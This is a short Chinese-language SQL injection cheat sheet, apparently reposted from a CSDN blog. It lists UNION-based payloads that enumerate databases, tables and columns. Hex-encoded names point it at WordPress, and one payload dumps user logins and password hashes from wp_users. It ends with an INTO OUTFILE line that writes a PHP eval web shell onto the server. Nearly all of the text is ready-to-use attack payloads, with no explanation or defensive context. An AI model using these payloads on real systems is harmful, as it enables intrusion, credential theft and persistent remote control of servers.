爆信息:
and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
============================================================================
1,爆库
and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --
2,爆表
and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--
3,爆字段
and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--
4,爆密码
and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--
=============================================================================
load_file()
select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'
原文链接: http://blog.csdn.net/mypc2010/article/details/7983992